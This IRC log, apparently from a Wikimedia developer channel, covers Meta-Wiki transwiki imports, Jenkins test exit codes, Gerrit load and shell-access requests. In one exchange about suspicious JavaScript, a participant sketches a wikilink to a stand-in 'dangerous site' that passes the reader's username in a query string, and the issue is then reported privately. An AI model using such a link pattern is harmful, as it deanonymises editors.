[03:35:33] So apparently transwiki importing doesn't tell you if there's already a title at the place where you're importing to? [03:35:42] I just made a mess at Meta-Wiki. [03:37:56] Susan: I think so, it just merges history [03:38:09] Pardon my French, [03:38:13] but that's pretty fucking retarded. [03:38:41] boxofjuice: It looks like the form doesn't even allow specifying a destination title. [03:38:49] Erm. [03:38:51] I can specify a namespace. [03:38:52] You sure? [03:38:57] Ok [03:39:06] How about sticking it in the userspace and then moving it to where we need? [03:39:07] destination namespace: all [03:39:42] I guess someone has made the determination that this feature is just functioning enough to not warrant being disabled. [03:40:47] huh: [22:38] boxofjuice: It looks like the form doesn't even allow specifying a destination title. [03:40:55] Which namespace would you like me to choose? [03:41:06] userspace [03:41:09] then we can move it [03:41:11] Knowing in advance that I'm not cleaning up whatever page this awful feature decides to trample. [03:41:23] We're gonna end up with a goddamn Meta-Wiki horcrux somewhere. [03:41:24] https://meta.wikimedia.org/wiki/User:Wikidata looks safe. [03:41:25] Susan: I'm pretty sure you can import to a different title [03:41:27] I've done it before [03:41:34] I'm lying. [03:41:38] I have such incentive and motive to lie. [03:41:41] There's no field for a title. [03:41:51] Susan: "Destination root page" [03:42:00] Set it to "Legoktm" [03:42:06] waaat [03:42:55] (Import log); 03:42 . . PiRSquared17 (Talk | contribs | block) transwikied User:Legoktm/Wikipedia:Wikidata ‎(1 revision from en:Wikipedia:Wikidata: per request) [03:42:59] https://test2.wikipedia.org/wiki/Special:RecentChanges [03:43:06] then move it [03:43:12] o.o [03:43:37] Oh, that's what I'm supposed to use? [03:44:09] Well, it's a good temporary name [03:44:37] 1. It's not in the userspace of some user called "Wikidata". 2. It preserves the original title. 3. Only 1 revision, this time? [03:47:09] Why aren't either of you admins on Meta-Wiki? [03:47:41] Susan: admin on a "content" project. [03:47:52] Well I guess I am, but huh isn't. [03:47:57] Susan: you know why [03:47:59] I hate everyone and everything. [03:48:03] I think it worked this time. [03:48:06] Without breaking everything. [03:49:24] https://gerrit.wikimedia.org/r/#/c/17809/ [03:49:26] Fascinating. [03:50:04] boxofjuice: now, move it to the page title you want [03:50:40] then Susan can import the other translations (to your userspace again), and I can fix it to use the new translation system [03:51:35] Susan: all of https://www.wikidata.org/wiki/Q4847210 needs to get imported [03:52:23] I guess someone has made the determination that this feature is just functioning enough to not warrant being disabled. https://bugzilla.wikimedia.org/show_bug.cgi?id=45823 [03:52:39] I just filed one. [03:52:42] Rawr. [03:53:14] I'm not a magician. [03:53:22] That looks like way more work than I signed up for. [03:54:23] Susan: I would do it, but I can't. I'm sure boxofjuice would say the same. :P [03:54:43] I have no idea why I can. [03:54:46] * boxofjuice would. [03:54:47] I can barely use the damn form. [03:54:50] Heh [03:54:51] just make sure you import only after boxofjuice has moved it [03:55:06] For example, move the French translation to [[Wikidata/Help/fr]] [03:55:07] If you can make a proper (text) list of the pages to import, I can do it later. [03:55:11] and the German one to [[Wikidata/Help/de]] [03:55:12] Or request on Meta-Wiki and some other admin will do it. [03:55:26] Susan: Sorry, you're already enlisted. [03:55:35] Besides, what are you going to do? Edit enwiki? [03:55:43] Do you know how hard it is to find a non-lazy Meta admin? [03:55:54] Keep looking. [03:55:54] Not very :P [03:56:08] What format do you want the list in Susan? [03:56:09] Just a list. [03:56:13] https://cs.wikipedia.org/wiki/Wikipedie:Wikidata [03:56:21] Or title\tnew title [03:56:29] Ok [03:56:30] 'cause I've gotta go through and import them individually. [03:56:33] Give me a sec [03:56:33] So ... [03:56:47] cs:Wikipedie:Wikidata --> User:Legoktm/Wikidata/de [03:56:49] Or cs [03:56:52] Or whatever. [03:56:57] So many ways to fuck this up. [03:57:21] I like how there's a namespace drop-down menu and a root page input, but not a place to just say "put this right here now." [03:57:31] Susan: actually, you can't do that [03:57:40] Great. [03:57:45] And even still, you can trample page histories. [03:57:56] You can do Legoktm/de/Wikipedia:Wikidata, though [03:58:02] I hope my annoyance is apparent. [03:58:14] Susan: that's why I've clear out [[User:Legoktm/Wikipedia:Wikidata]] to a throwaway page [03:58:26] so as to not have junk in the page history of the import [03:58:41] I have no idea what you're saying. [03:58:46] (Spostamenti); 03:57 . . PiRSquared17 (Discussione | contributi) ha spostato la pagina User:Legoktm/Wikipedia:Wikidata a User:PiRSquared17/Left over page senza lasciare redirect ‎(so as to not have junk in the page history) [03:59:07] so you can't trample the history of that one now [03:59:35] Fascinating. [03:59:41] You can move without leaving a redirect? [03:59:50] Because I'm a global sysop [04:00:00] abuse! [04:00:03] I often move junk into my userspace because it's easier than finding a meta admin [04:00:04] ok nearly done [04:00:11] Problem? [04:00:11] So much abuse. [04:01:04] boxofjuice: I just need langcode:namespace:title --> langcode. [04:01:10] I can figure the rest of it out. [04:01:10] ok [04:01:11] Maybe. [04:01:36] http://dpaste.de/0FH1E/raw/ [04:02:29] I love how people always complain about how Meta admins are abusive :P [04:02:54] Just wait till someone tries to clean up the "histmerge" Susan accidentally did today. [04:03:06] I might attempt it when I become a sysop :P [04:03:26] boxofjuice: Are those all Wikipedias? [04:03:33] I'd assume so [04:03:39] Susan: Yes [04:03:59] Susan: make sure you use the "User" namespace, the root page "Legoktm/(langcode here)" [04:04:02] I think I can just use "Wikidata/Help" as a root page now, right? [04:04:12] With the (Main) namespace. [04:04:13] That would work [04:04:26] we'd still have to move it though (but I can handle that) [04:04:28] God help me. Okay, here we go. [04:05:39] Susan: just to be safe, include the language code in the root page name [04:05:52] Import failed: No pages to import. [04:06:04] ... [04:06:12] I tried with ... [04:06:18] el:Βικιπαίδεια:Wikidata [04:06:28] I wonder if "w" is really "en.wikipedia". [04:06:36] Susan: it is [04:06:40] Oh. [04:06:44] you need to change the language code in the drop down [04:06:44] Then how am I supposed to import these? [04:07:05] Special:Import is so messed up [04:07:05] commons, foundation, w, cs, fr, strategy [04:07:09] Those are my options. [04:07:15] Susan: import the French one please [04:07:27] and the Czech one :P [04:08:38] You know, it's just easier to copy and paste :P [04:09:10] [obviously with attribution] [04:09:35] Probably. [04:10:49] I meant to say done. [04:10:53] I did fr and cs. [04:10:55] I think. [04:11:26] Wait wat. [04:11:32] You can't import from anywhere? [04:11:36] No. [04:11:52] https://noc.wikimedia.org/conf/InitialiseSettings.php.txt [04:11:55] wgImportSources [04:11:56] boxofjuice: I can handle it for you. Just remember to give me a barnstar [04:12:03] 'metawiki' => array( 'commons', 'foundation', 'w', 'cs', 'fr', 'strategy' ), [04:12:21] huh: :DDDD [04:12:33] Copy and paste is fine, I guess. [04:12:34] This is so stupid, though. [04:12:45] Almost as bad as moving files from a local wiki to Commons. [04:12:46] Almost. [04:14:28] boxofjuice: give me a link to a place to report interwiki conflicts [04:14:36] the current one is enwiki-centric [04:14:46] https://www.wikidata.org/wiki/Wikidata:Interwiki_conflicts [04:14:48] Are you going to soft-redirect these local pages? [04:14:52] Or will there just be two copies now? [04:15:07] Susan: I think we should soft redirect them as soon as the meta copies are ready [04:15:14] So in like a few minutes [04:15:18] Okay. [04:15:22] I'm going to do something else now. [04:15:25] make that maybe an hour [04:15:53] ok [04:16:01] Susan: Clean up the mess you made? :P [04:16:33] Susan doesn't make messes, Only rainbows and butterflies >.> [04:17:35] boxofjuice: it's not worth it [04:17:51] I'll handle it if I become a local admin, or just ask a steward to do it [04:18:02] ok [04:18:02] :P [04:19:44] I'm working on the translation, then I'll import them and convert them [04:20:27] Susan: A week is too long. [04:20:56] Why's that? [04:21:04] Haven't most of these bots been running for years? [04:21:41] Except they weren't fighting humans [04:21:48] Plus [04:21:52] If they use the API [04:22:00] They can't tell the difference between Wikidata + local links [04:23:53] I posted on the talk page. [04:27:10] Do OTRS volunteers have to be identified? [04:27:22] No [04:27:29] Fascinating. [04:27:38] Not unless they're in a queue like oversight-wp-en [04:27:44] In which case they need to ID for oversight [04:28:37] Okay. [04:28:42] https://meta.wikimedia.org/w/index.php?title=Non-disclosure_agreements&diff=5302620&oldid=5302202 [04:34:16] Oh right [04:34:28] At one time [04:34:31] OTRS volunteers were told to identify [04:34:39] But apparently that policy lived for a very short time [04:34:44] And it was 16+ identification. [04:34:50] RD would know more. [05:14:46] what's the equivalent of 'mwscript eval.php enwiki' that would run a php file? mwscript foo.php enwiki looks for foo.php in maintenance; if i specify the complete path it barfs. [05:15:09] piping the script into eval.php doesn't work because it evaluates each line separately [05:15:29] ('barf' is a technical term.) [05:18:20] can't you remove all the line breaks so the script is in one line? [05:19:03] yes, but that's a bit yucky [05:22:19] ori-l: require() ? [05:22:22] (wild guess) [05:22:36] jeremyb_: heh, obvious and clever. thanks. [05:22:49] that's forehead-slap worthy i think [05:37:40] * jeremyb_ slaps ori-l with a large trout [05:37:48] thanks, that's sobering [05:38:32] ani lishon. or something. layla tov! [05:47:12] layla tov [08:16:17] From my CS project: [08:16:19] "Wikipedia and its related sites are based on the Wikimedia Architecture, which uses a LAMP platform based on GNU/Linux, Apache, MySQL, and PHP, using multiple, redundant web servers behind a load-balancing virtual router for reliability and performance." [08:16:24] The understatement is killing e :P [08:16:27] s/e/me/ [08:16:52] "Wikimedia Architecture" [08:17:00] domas is cited in the project abstract, though :P [08:37:08] FastLizard4: loldomas [08:37:16] ikr [08:39:28] "While LAMP works fairly well for Wikipedia..." [08:39:31] Only fairly well? :P [08:39:38] I thought it worked pretty damn well [08:39:55] Until the cooling in pmtpa fails [08:39:56] :P [10:01:11] emergncy secuirty issue. I need a developer to take a look at a code [10:07:06] anyone [10:26:22] Mardetanha: Is it love on the wikimedia cluster? [10:26:43] *live [10:26:45] p858snake|l: no, it is about suspecious js [10:27:39] Mardetanha: if its to do with a wikimedia or mediawiki project, you can file a bug on our bugzilla (https://bugzilla.wikimedia.org) and "Security" and only the security team can see that [10:28:48] p858snake|l: it should not be discussed openly, i prefer to discuss it privately, but i can say, it seems a user trying to get users information by pointimg them to his own website [10:28:49] and in IRan this could be so danegrous [10:29:25] Mardetanha: anything in the security section is private to the security team [10:29:54] p858snake|l: good [10:29:57] is that website trying to look as if they wre still at wikipedia? [10:30:43] Platonides: no, but i assume it could users with their assoiciated ips [10:36:02] only if he knows when that wiki username followed his link [10:36:38] Platonides: it is trying to load wikidata page, [10:36:48] it is possible [10:40:16] Mardetanha, it is not possible for a remote website to know the username you are logged in as [10:40:20] Silke_WMDE: great email, wonderful :) I think it's also worth copying to Meta, [[Future of Toolserver/Request for help]] or whatever, so that end users know what's happening too. :) [10:40:31] (or if you found a way, it's an important bug) [10:40:55] Nemo_bis: good idea, I'll do that [10:41:22] Platonides: writing a report in buzilla [11:17:13] Silke_WMDE: thanks for the email! [11:17:36] saper: :) [11:18:28] Nemo_bis: I added the text of the e-mail here http://meta.wikimedia.org/wiki/Future_of_Toolserver#Request_for_help_to_all_toolserver_users [11:20:30] looks like work both on meta and on mediawiki.org :) [11:20:44] Silke_WMDE: great [11:21:25] these two wikis are confusing... meta vs. mediawiki... [11:22:05] Platonides: if they used a wikilink , they could inculde a {{currentuser}} parserfunction or something if they were that desperate (but i think our cache would kill that from working) [http://example.org/somedangeroussite/index.html?referrer={{{currentuser}}} Google Search!] [11:22:54] Silke_WMDE: yeah in the old times (pre-Toolserver.org wiki) TS stuff used to be on meta [11:28:44] Silke_WMDE: wikified and added to the sitenotice and Wikimedia Forum [11:29:08] yes, Meta is the most logical place for Toolserver stuff, but WMF prefers to use mediawiki.org for Labs stuff so things are stretched [11:30:45] Silke_WMDE: can I also forward it to the mailing lists? [11:32:04] Nemo_bis: thanks! and sure you can forward it. I sent it to labs-l and toolserver-l (and I think toolserver-announce) a little while ago but sending it again won't harm. :) Feel free to spread the word! [11:32:11] and thanks for your help! [11:39:30] XD "to wikify" [11:52:19] :( Thehelpfulone, why does mailman now boycott my announce crossposting? [11:52:38] Request for help to all Toolserver users: list the tools you want to keep Is being held until the list moderator can review it for approval. The reason it is being held: Too many recipients to the message [11:53:04] have we cross the cross-posting limit mailman likes with the 2 new sisterprojects or was the limit lowered [14:38:54] Hi :). Where exactly is the code of the Android mobile client? [14:40:45] FastLizard4|zZzZ: errr, link? [14:41:16] fale: hey! The app? [14:41:21] fale: or the commons app? [14:41:38] fale: https://github.com/wikimedia/WikipediaMobile or https://github.com/wikimedia/android-commons [14:41:43] fale: also there is #wikimedia-mobile :) [14:43:02] @YuviPanda thanks :) I was looking for WikipediaMobile and I had no idea about the existance of android-commons ;) [14:43:23] fale: :) active development on WikipediaMobile has ceased for now, but commons is going full on ahead [14:43:40] Mardetanha: did you file the bug? can i get CC? [14:44:03] jeremyb_: on the phne [14:44:05] YuviPanda: why cheased? No one is interested anymore or for other reasons? [14:44:12] k [14:44:19] fale: I was the only one majorly working on it, and I'm now working on android-commons [14:44:28] fale: plus we've had very bad experiences using phonegap [14:44:47] commons is not phonegap? [14:45:03] jeremyb_: nope [14:45:04] it is natvie [14:45:06] *native [14:45:08] YuviPanda: I'm interested in working on a Wikipedia Mobile app for android... I'm fine even with native code [14:45:11] and there's an iOS version [14:45:29] fale: yes! That would be nice - we were going to make a native version at some point [14:45:59] YuviPanda: I can start it and hope other will help too? :D [14:46:14] fale: sure! There is the mobile-l mailing list, so please announce there :) [14:47:38] YuviPanda: perfect I'm going to announce it and start working :) [14:49:15] YuviPanda: to push the app in the store, I'll have to ask someone in WMF or to you? [14:49:34] we still haven't worked tha tout [14:49:38] but am sure we can figure something out on that [14:50:01] YuviPanda: well... at the moment who is working? [14:50:05] *how [14:50:44] fale: well, at the moment the only devs on android stuff has been mre [14:50:45] *me [14:50:48] and i hav ekeys to push to the setore [14:51:15] YuviPanda: so, when the app is ready I can ask you, I suppose? [14:51:35] it is supposed to be a community process, but as I said, don't worry about it [14:51:42] we'll figure it out [14:51:49] Oki :) [15:06:40] sorry, "Sam Reed" in now online? [15:07:01] Wim_b, see Reedy [15:07:54] thanks [15:23:35] ciao Wim_b [15:23:46] e ciao fale [15:24:00] invasione italiana oggi, vedo [15:25:18] Wim_b or you can just type @notify Reedy and our bot will ping you when he's back :P in case Reedy wouldn't [15:25:44] ciano Nemo_bis :) [15:26:39] or just use memoserve (/msg memoserv help) :) [15:31:18] p858snake|l that doesn't ping you back and target users (including me) mostly never read it :P [15:31:47] Special:Email is better IMHO [15:31:58] or whatever the link is [15:32:07] errr, what about user talk page? [15:32:16] petan, memoserv sends you a notice when you reconnect [15:32:21] plus, I think it also emails you [15:32:53] Platonides no it doesn't e-mail or it didn't... regarding notices, they are easy to overlook in all that messages you get on reconnect [15:32:58] it does, if you have a email address attached [15:33:07] you might also need to enable it [15:33:09] I have email attached because otherwise I couldn't register [15:33:15] maybe [15:33:18] let me checkl [15:33:29] ciao Nemo_bis io sono entrato per chiedere scusa per una figura di merda immane :/ [15:33:49] don't see that option in there :/ [15:34:24] -NickServ- Flags : HideMail, EMailMemos, Private [15:34:27] its a NS flag [15:34:31] aha [15:35:04] Wim_b: hai chiesto una configuratione sbagliata e ucciso Wikizionario? :D [15:35:09] petan: thanks, I wrote in query. sooner or later will read, it was just a "sorry" :) [15:36:02] Nemo_bis: no, l'admin storico di wikivoyage mi ha dato un'informazione sbagliata e mi ha fatto aprire un bug mezzo errato, oltretutto, mi sono anche mezzo incavolato quando mi hanno dato torto, invece ce lo avevo... [15:36:44] https://it.wikivoyage.org/w/index.php?title=Discussioni_utente:Wim_b&diff=next&oldid=205679 <- qui, mi pare di capire che nemmeno l'admin vedeva il "!", o sbaglio? [15:37:44] sembrerebbe [15:37:51] it.voy è un po' sfortunato [15:38:06] e ora, mi girano anche un po' le scatole, perché va bene metterci la faccia, ma almeno non farmi fare figure del menga... [15:39:35] volevo appunto chiedere scusa al dev perché effettivamente mi aveva detto che era attivo, e mi ha pure chiesto se intendevo cambiare le impostazioni anche agli autoconfirmed. io spavaldo ho pure detto "no, il rpoblema è che non si vedono i "!" nemmeno alle modifiche degli IP" -.- [15:41:26] Wim_b: ma non preoccuparti troppo, il 75 % delle richieste di configurazione contiene errori madornali [15:41:37] è per quello che stanno a marcire per mesi, in media :D [15:41:49] Nemo_bis: un po' sfortunato per cosa? (perché altri bug non li apro, e sarà meglio che qualcun'altro del progetto si registri a bugzilla, perché se aspettano me... [15:42:24] d'accordissimo, però se le aprono gli altri ok, che debba passare come quello che no vede i "!" che ci sono non mi pare il caso :p [17:36:26] robla: it's always fun when a long uncancelable disk repair check is running when you don't expect [17:37:04] * Aaron|home wonders if that was another result of dealing with that horribly broken hp printer installer [17:43:09] Aaron|home: isn't it usually the result of canceling it every time until it becomes uncancelable? :p [17:44:07] I could have cancelled it but the window for that closed since I wasn't in front of the screen at that time [17:44:44] speaking of uncancelable, the hp installer had to be deleted or it would keep popping up in startup, and "cancel" made it restart [17:44:57] lol [17:45:03] and continuing made it give an error, restart the computer, and rinse and repeat [17:45:12] there were like 4-5 layers of serious bugs [17:45:38] I mean if it was just the "setup failed" error, it wouldn't be so bad [17:46:34] one time the installer locked up the PC and a hard restart was needed [17:46:34] Aaron|home: might be an environmentalist punishment for consuming paper [17:46:39] maybe that caused the disk problems [17:46:55] I rarely use it though, heh [17:47:07] all I wanted to do was setup the wireless mode :) [17:47:09] hmm "Labs page Deployments has been changed", should wikitech have wgsitename fixed? [17:47:34] I think I'd hardly manager to use notepad on windows, nowadays [17:47:38] *manage [18:10:09] wc [18:10:13] wc [18:13:13] wc -l [18:13:16] ;) [18:15:39] Am I right in presuming that the "slow query log" is something that only Ops can access? [18:17:52] hey Jeff_Green -- hope you're doing well today. Am I right in presuming that the "slow query log" is something that only Ops can access? [18:17:59] sumanah: it depends on the definition of ops [18:18:14] any "shell user" can access it, AFAIK [18:18:31] http://wikitech.wikimedia.org/wiki/Logs [18:18:50] I tried searching wikitech.wikimedia.org and didn't see a reference to it [18:19:08] where did you see that? [18:19:27] sumanah: you're talking about mysql's slow query log? that's a file local to the db, requires shell access to the db server [18:19:34] Yes [18:19:37] asher has setup ishmael, a web tool to analyze slow queries [18:19:52] but because slow queries can contain private data, this is limited to WMF staff only [18:19:57] I hear people talking about "slow query log" as one of the things we look at to figure out what's not performing well so we can optimize it [18:20:04] until we have a "has signed NDA" group in LDAP [18:20:31] which last time I heard it was messy because of non-technical issues [18:21:04] Nemo_bis: within https://wikitech.wikimedia.org/wiki/Logs are you saying that I should look at "slow-parse.log" for similar information? [18:21:12] https://ishmael.wikimedia.org/ is that tool [18:21:39] okay. [18:21:56] ah neat [18:30:00] sumanah: yes, or the point where it says that it's on fluorine [18:33:31] hi! [18:33:46] hi domas [18:34:04] Jeff_Green: when people talk about "the slow query log" do they mean slow-parse.log? [18:34:21] i don't. :-P [18:34:23] sumanah: no; slow query log shows slow database queries [18:34:36] slow-parse.log shows articles/templates that took the parser a long time to parse [18:34:41] ok. so it's not listed on https://wikitech.wikimedia.org/wiki/Logs - is that right? [18:34:44] http://dev.mysql.com/doc/refman/5.0/en/slow-query-log.html [18:35:04] Nemo_bis: I think you confused me. :( [18:35:18] ah well. [18:36:05] would anyone be terribly offended if pgehres and I did a quick cluster deploy to fix an annoying centralnotice bug? [18:36:35] mwalker: go for it [18:36:55] domas: Any suggestions on how to improve this query to get rid of the filesort/temporary? http://p.defau.lt/?aMLMdUsjWcI2mlINoiZd4Q [18:37:38] sumanah: you might be interested in https://gerrit.wikimedia.org/r/#/c/49678/ [18:37:49] looking [18:38:02] reedy: watchlist query? [18:38:16] oh dear [18:38:17] Yeah [18:38:26] hehe [18:38:30] the thought there was to make the slow parse log publicly available, so that volunteers and community members find out about egregiously bad templates, and also monitor on an ongoing basis performance improvements brought on by scribunto [18:38:34] pgehres: cool -- so pull master of centralnotice; meta is currently on wmf11 [18:38:37] you know that watchlist query change was my biggest improvement ever to wikipedia?!!? [18:38:41] thats how I started [18:39:01] reedy: this is my favorite interview question btw, how to improve watchlist query ;-D [18:39:01] sumanah: but the slow parse log also contains data from private wikis, so there's a need for some filtering [18:39:03] is there any source on what work is needed where in the ops scope? [18:39:05] yeah [18:39:15] We all know the answer is to drop the table [18:39:20] qgil_: ^ question from matanya [18:40:59] matanya, currently I'd recommend to start with http://www.mediawiki.org/wiki/Wikimedia_Labs#TODO and Ryan_Lane as point of contact [18:41:15] ori-away: sumanah yeah, we recently had a bit of a blowup about log data being published for privacy concerns. [18:41:16] Thanks qgil_ [18:41:25] reedy: I don't like join buffer tho [18:41:29] erik specifically asked to have things run by him if log data is going to be published [18:41:40] I wonder what it means there [18:41:42] I'd strongly recommend getting his signoff before publishing anything [18:41:46] mwalker: cool, only meta is affected? [18:41:54] matanya: we have a number of projects to participate in [18:42:06] matanya: you should join #wikimedia-labs [18:42:09] matanya, fwiw in my backlog: 2013-01-08: How to get volunteers involved in Operations / sysadmin tasks. :) http://www.mediawiki.org/wiki/User:Qgil [18:42:29] matanya, feedback and help from prospective volunteers is *very* helpful to improve the current situation [18:43:01] thanks both. BTW, Ryan_Lane your talk at puppet conf pushed me to put a hand [18:43:07] :) [18:43:09] ah, great [18:43:10] :) [18:44:07] pgehres: yep; only meta [18:44:20] hashar- I have a few Jenkins questions for you (no rush though). [18:44:20] hashar- In https://integration.mediawiki.org/ci/job/mwext-Scribunto-testextensions-master/80/console it looks like Jenkins tested 52572 rather than 52569 (the fatal error at the bottom refers to code added in 52572; the others are legit). [18:44:20] hashar- In https://integration.mediawiki.org/ci/job/php-luasandbox-build/25/console one of the unit tests failed but Jenkins reported success. It would also be helpful if Jenkins could include the contents of tests/*.log (which are created only on test failure). [18:46:05] reedy: SQL/relational algebra cannot express the problem that well [18:46:26] reedy: I love explaining how to approach this problem at huge scale [18:46:38] reedy: but it takes an hour :-) [18:46:54] reedy: short answer is "merge individual change streams" [18:47:15] add word "smart" somewhere in there [18:47:20] and you will get optimal algorithm [18:47:28] if you add "adaptive", it can be a proper paper [18:48:06] mwalker: gerrit it taking foverer ... [18:48:28] I know! it's terribly annoying today [18:49:04] what are rc_types 3 and 5? [18:51:50] ^demon: is manganese doing okay? gerrit seems to iffy this am [18:51:58] <^demon> wfm... [18:52:00] <^demon> I'll check tho [18:52:05] http://ganglia.wikimedia.org/latest/graph_all_periods.php?h=manganese.wikimedia.org&m=cpu_report&r=hour&s=descending&hc=4&mc=2&st=1362682239&g=cpu_report&z=large&c=Miscellaneous%20eqiad [18:52:18] https://meta.wikimedia.org/wiki/Metrics_and_activities_meetings/2013-03-07 meeting in 10 min [18:52:27] my "git submodule update --init --recursive" is just hanging [18:53:00] Reedy, you can removed it by removing the ORDER BY :P [18:53:57] <^demon> pgehres: ouch. [18:54:26] sumanah: i like that we have the metrics meetings on youtube now, i can watch them while still working at my desk :D [18:54:57] <^demon> pgehres: 14583 gerrit2 20 0 7061m 2.7g 5708 S 599 34.6 5471:14 java [18:55:13] :( harder to ask questions though brion [18:55:15] oh java [18:55:20] either asking you or having you ask [18:57:55] thanks ori-away [18:58:27] <^demon> pgehres: So, gerrit flipped out a little while ago and restarted itself. [18:58:51] <^demon> The cpu spike we're seeing is a) restart procedures and b) all the queued things trying to catch up (plus normal traffic) [18:59:09] ^demon: fun times with open source software [18:59:14] <^demon> Indeed! [19:00:08] <^demon> There's 7 upload-packs in the queue now, so yeah...curious what'll happen once that's all caught up. [19:00:44] ^demon: should I just punt on this deployment until gerrit catches up? [19:00:52] domas: meh [19:00:54] <^demon> Eh, it's prolly fine. [19:01:00] you say that ... [19:01:07] but I can't get the branch I need :-) [19:01:33] oooh, there is goes [19:02:56] domas: I can't see a way around sorting without massive data duplication [19:03:18] * Aaron|home wonders what the best trade offs are [19:05:09] well that or scanning a large amount of rows of course [19:07:26] Remove watchlists [19:08:46] * Aaron|home pushes Reedy back into gerrit [19:13:12] anomie: regarding luasandbox test failing and the build being a success ( https://integration.mediawiki.org/ci/job/php-luasandbox-build/25/console ) I guess the 'make test' does not report an exit code > 0 [19:13:35] mwalker: out on testwiki [19:13:44] pgehres: cool [19:13:57] hashar- You're probably right. You could just check for those tests/*.log files, probably [19:14:28] <^demon> pgehres: Everything seems pretty much back to normal by now :) [19:14:52] ^demon: awesome, but i am done with the gerrit parts of the deploy [19:15:06] <^demon> Yeah, just fyi :p [19:15:07] unless mwalker needs another patchset [19:15:18] anomie: I guess 'make test' report a success because it successfully send the bug report to PHP QA [19:15:29] pgehres: nope; it's working [19:15:37] continue as planned! [19:15:39] mwalker: awesome, i will sync [19:15:42] <^demon> pgehres: If you're curious, `ssh -p 29418 gerrit.wikimedia.org gerrit show-queue` shows you fun things :) [19:17:13] mwalker: syncing [19:17:17] anomie: Jenkins runs : phpize && ./configure && make && make test [19:17:37] anomie: so if you find out the magic to have 'make test' to stop reporting and exit 1, that will make the job fail :-) [19:17:45] mwalker: done [19:17:55] whoot whoot [19:26:40] <^demon> hashar, anomie: It seems php's make test is stupid, and returns 0 even on failure. [19:26:45] hashar- make test && if tail -vn +1 tests/*.log 2>/dev/null; then false; else true; fi ? [19:26:51] <^demon> Setting TEST_PHP_ARGS to -q should skip the question entirely. [19:27:07] <^demon> (The do you want to send crap to php-qa) [19:27:10] anomie: a bit hacky [19:27:15] ahh [19:27:19] env variable would be nice [19:27:23] so just do something like: [19:27:29] TEST_PHP_ARGS="-q" make test [19:27:30] ? [19:28:06] <^demon> That'll at least skip the "do you want to send results" crap. [19:28:13] <^demon> But I think it's still dumb and exits 0. [19:31:33] <^demon> Yeah, make test is stupid. [19:31:55] <^demon> anomie's idea should work. [19:32:03] I suppose TEST_PHP_ARGS="-q --show-diff" might be good enough to show the actual test results. [19:32:27] Then you might be able to just do [ -e tests/*.log ] after the make test [19:32:57] err. [ ! -e tests/*.log ] [19:34:17] hmm. PHP bug https://bugs.php.net/bug.php?id=60285 is closed, but no mention that it was actually fixed [19:35:13] petan: I added you to the groupo [19:35:14] *group [19:35:18] can you test this? [19:35:27] https://wikitech.wikimedia.org/w/index.php?title=Special:Ask&q=[[Category%3AShell+Access+Requests]][[Is+Completed%3A%3Afalse]]&p=format%3Dtemplate%2Flink%3Dall%2Fheaders%3Dshow%2Fsearchlabel%3DOutstanding-20Requests%2Fdefault%3D%28no-20outstanding-20requests%29%2Ftemplate%3DShell-20Request%2Fintrotemplate%3DShell-20Request-2Fhead%2Foutrotemplate%3DShell-20Request-2Ffoot&po=%3FShell+Request+User+Name%0A%3FShell+Justification%0A%3FModificati [19:35:34] ewwwww that's such an ugly query [19:35:44] petan: https://wikitech.wikimedia.org/wiki/Special:UserRights/Wooster [19:35:52] you should be able to modify that [19:37:03] hm. wrong channel [19:38:11] Ryan_Lane hi sorry my client was off [19:38:32] yes I see that - not revokable though but I think that's ok [19:39:04] not being able to revoke is actually good :) [19:39:09] is there some page or bugzilla I should watch for these requests so that I can handle them? [19:39:18] if you revoke shell it'll remove them from everything [19:39:25] aw [19:39:27] right [19:39:39] ah. this is listed for cloudadmins [19:39:42] hm [19:39:58] * Ryan_Lane really doesn't want to add another sidebar [19:40:02] I guess I will, though [19:40:06] heh [19:40:35] oh. it won't add it for most people anyway [19:40:45] not sure what you mean now [19:41:09] hashar- It looks like in PHP's git master, you can do "REPORT_EXIT_STATUS=1 make test" to get it to exit properly. But I don't know what version of PHP that might appear in. [19:41:24] petan: hard refresh wikitech [19:41:30] petan: there's a new sidebar [19:41:34] okay [19:41:41] whoops [19:41:45] one sec. I broke that [19:41:46] I see it [19:41:48] heh [19:42:04] ok. now refresh :) [19:42:25] ok [19:42:27] add woosters into shell, so I know this is working properly [19:42:38] thanks and one more thing [19:42:47] oh. this process sucks a little right now [19:42:49] anomie: git log -SREPORT_EXIT_STATUS [19:42:51] am I supposed to handle every request there even if no request reason is filled in? [19:42:58] yeah [19:43:04] we add people unless we have a reason not to [19:43:05] anomie: been introduced by 3966df7fc83 of php-src "Add support for Travis CI" [19:43:11] it's mostly to avoid sockpuppets [19:43:16] granted [19:43:19] cool [19:43:21] hashar- So what php version will include that? [19:43:21] ok [19:43:25] working :) [19:43:42] anomie: let me update my branches. But I guess php 5.5 [19:43:51] git branch --contain 3966df7fc83093766e5e6862b18b8ef03ef58e09 --all [19:43:53] petan: so, right now you also need to go edit the request page too [19:43:58] to mark it as done [19:43:58] anomie: master /PHP-5.5 :( [19:44:04] ok [19:44:06] I have a bug open to make that automatically happen [19:44:24] anomie: ah no that might be unrelated. Need to look again [19:45:16] Ryan_Lane should I also send a message to these users that their request was completed? [19:45:25] or something like that [19:45:27] hashar- Until then, TEST_PHP_ARGS="-q --show-diff" make test && [ \! -e tests/*.log ] should work [19:45:44] if I requested shell access I would hardly notify it from wiki logs [19:45:59] petan: hm. we haven't been [19:46:19] petan: we should probably automatically add the page to the user's watchlist, if possible [19:46:22] well, I am doing this on mediawiki for bureaucrat stuff, even cross-wiki [19:46:27] then they'll get a notification when it's edited [19:46:31] right [19:46:36] well, actually, that won't help either [19:46:39] if they watch the watchlist heh [19:46:44] in the future the page doesn't need to be edited [19:46:46] anomie: the run-tests.php script on gallium has support for REPORT_EXIT_STATUS :-] [19:46:57] we could just create a template [19:47:05] which could be substituted to user talk page [19:47:09] if (getenv('REPORT_EXIT_STATUS') == 1 and preg_match('/FAILED(?: |$)/', implode(' ', $test_results))) { exit(1) ;  } [19:47:10] hashar- The problem is that the makefile generated by phpize needs to forward the exit code [19:47:26] anomie: I guess make will fail [19:47:30] like {{subst:ShellGranted}} [19:47:45] that could be automatic too [19:47:59] for example twinkle is doing similar thing [19:48:43] anomie: a quick test and make manage show that GNU make exit 2 whenever something failed [19:49:25] hashar- How about if the line has a "-" at the beginning? [19:49:38] Like the Makefile made by PHP does for that whole block [19:50:23] anomie: the -@command ? [19:52:24] hashar- Well, the "-" and "@" seem to be separate flags ("suppress errors" and "no echo"), but yes [19:54:13] petan: we could add a hook that adds an echo notification [19:54:26] so that when a user is added to shell, they get an echo notification [19:55:36] this honestly may be nice to just have in core [19:55:53] it's good to know when your groups have been modified [19:56:03] let me add a bug for this [19:57:10] I'm trying to deploy a core update to wmf11, but I get the following error: 